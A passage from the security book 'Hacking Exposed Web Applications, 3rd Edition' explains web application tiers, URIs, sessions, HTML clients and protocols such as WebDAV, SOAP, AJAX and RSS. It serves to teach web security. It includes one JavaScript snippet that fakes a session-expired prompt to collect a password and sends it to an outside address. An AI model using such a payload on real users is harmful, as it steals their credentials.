Resources | HACKING EXPOSED WEB APPLICATIONS, 3rd Edition

Typically, the ultimate goal of the attacker is to gain unauthorized access to web application resources. What kinds of resources do web applications hold?

Although they can have many layers (often called "tiers"), most web applications have three: presentation, logic, and data. Presentation is usually a HyperText Markup language (HTML) page, either static or dynamically generated by scripts. These don't usually contain information of use to attackers (at least intentionally; we'll see several examples of exceptions to this rule throughout this book). The same could be said of the logic layer, although often web application developers make mistakes at this tier that lead to compromise of other aspects of the application. At the data tier sits the juicy information , such as customer data, credit card numbers , and so on.

How do these tiers map to the URI? The presentation layer usually is comprised of static HTML files or scripts that actively generate HTML. For example:

http://server/file.html (as static HTML file)
http://server/script.php (a HyperText Preprocessor, or PHP, script)
http://server/script.asp (a Microsoft Active Server Pages, or ASP script)
http://server/script.aspx (a Microsoft ASP.NET script)

Dynamic scripts can also act as the logic layer, receiving input parameters and values. For example:

http://server/script.php?input1=foo&input2=bar
http://server/script.aspx?date=friday&time=1745

Many applications use separate executables for this purpose, so instead of script files you may see something like this:

http://server/app?input1=foo&input2=bar

There are many frameworks for developing tier-2 logic applications like this. Some of the most common include Microsoft's Internet Server Application Programming Interface (ISAPI) and the public Common Gateway Interface (CGI) specification.

Whatever type of tier-2 logic is implemented, it almost invariably needs to access the data in tier 3. Thus, tier 3 is typically a database of some sort , usually a SQL variant. This creates a whole separate opportunity for attackers to manipulate and extract data from the application, as SQL has its own syntax that is often exposed in inappropriate ways via the presentation and logic layers. This will be graphically illustrated in Chapter 7 on web datastores.

Authentication, Sessions, And Authorization

HTTP is statelessno session state is maintained by the protocol itself. That is, if you request a resource and receive a valid response, then request another, the server regards this as a wholly separate and unique request. It does not maintain anything like a session or otherwise attempt to maintain the integrity of a link with the client. This also comes in handy for attackers, as there is no need to plan multistage attacks to emulate intricate session maintenance mechanismsa single request can bring a web application to its knees.

Even better, web developers have attempted to address this shortcoming of the basic protocol by bolting on their own authentication, session management, and authorization functionality, usually by implementing some form of authentication and then stashing authorization/session information into a cookie. As we'll see in Chapter 4 on authentication, and Chapter 5 on authorization (which also covers session management), this has created fertile ground for attackers to till, over and over again.

The Web Client And HTML

Following our definition of a web application, a web app client is anything that understands HTTP. The canonical web application client is the web browser. It "speaks" HTTP (among other protocols) and renders HyperText Markup Language (HTML), among other markup languages.

Like HTTP, the web browser is also deceptively simple. Because of the extensibility of HTML and its variants, it is possible to embed a great deal of functionality within seemingly static web content. For example, embedding executable JavaScript in HTML is this simple:

 <html> <SCRIPT Language="Javascript">var password=prompt ('Your session has expired. Please enter your password to continue.',''); location.href="https://10.1.1.1/pass.cgi?passwd="+password;</SCRIPT> </html>

Copy this text to a file named "test.html" and launch it in your browser to see what this code does. Many other dangerous payloads can be embedded in HTMLbesides scripts, ActiveX programs, remote image "web bugs ," and arbitrary Cascading Style Sheet (CSS) styles can be used to perform malicious activities on the client, using only humble ASCII as we've just illustrated.

Of course, as many attackers have figured out, simply getting the end user to click a URI can give the attacker complete control of the victim's machine as well. This again demonstrates the power of the URI, but from the perspective of the web client. Don't forget that those innocuous little strings of text are pointers to executable code!

Finally, as we'll describe in the next section, new and powerful technologies like AJAX and RSS are only adding to the complexity of the input that web clients are being asked to parse.

We'll talk more about the implications of all this in Chapter 10.

Other Protocols

HTTP is deceptively simpleit's amazing how much mileage creative people have gotten out of its basic request/response mechanisms. However, it's not always the best solution to problems of application development, and thus still more creative people have wrapped the basic protocol in a diverse array of new dynamic functionality.

One of the most significant additions in recent memory is Web Distributed Authoring and Versioning (WebDAV). WebDAV is defined in RFC 2518, which describes several mechanisms for authoring and managing content on remote web servers. Personally, we don't think this is a good idea, as protocol that in its default form can write data to a web server leads to nothing but trouble, a theme we'll see time and again in this book. Nevertheless, WebDAV is backed by Microsoft and already exists in their widely-deployed products, so a discussion of its security merits is probably moot at this point.

More recently, the notion of XML-based web services has become popular (although some would argue that its popularity is waning already). Although very similar to HTML in its use of tags to define document elements, the eXtensible Markup Language (XML) has evolved to a more behind-the-scenes role, defining the schema and protocols for communications between applications themselves . The Simple Object Access Protocol (SOAP) is an XML-based protocol for messaging and RPC-style communication between web services. We'll talk at length about web services vulnerabilities and countermeasures in Chapter 8.

Some other interesting protocols include AJAX (Asynchronous JavaScript and XML), and RSS (Really Simple Syndication). AJAX is a novel programming approach to web applications that creates the experience of "fat client" applications using lightweight JavaScript and XML technologies. Some have taken to calling AJAX the foundation of "Web 2.0." For a good example of the possibilities here, check out http://www.live.com. We've already noted the potential security issues with executable content on clients, and point again to Chapter 10 for deep coverage.

RSS is a lightweight XML-based mechanism for "feeding" dynamically changing "headlines" between web sites and clients. We'll again cite the example of http://www.live.com, which provides RSS reader "gadgets" that you can embed in your custom homepage to aggregate your favorite RSS feeds in a single place. The security implications of RSS are potentially largeit accepts arbitrary HTML from numerous of sources and blindly republishes it. As we saw in our earlier discussion of the dangerous payloads that HTML can carry, this places a much larger aggregate burden on web browsers to behave safely in diverse scenarios.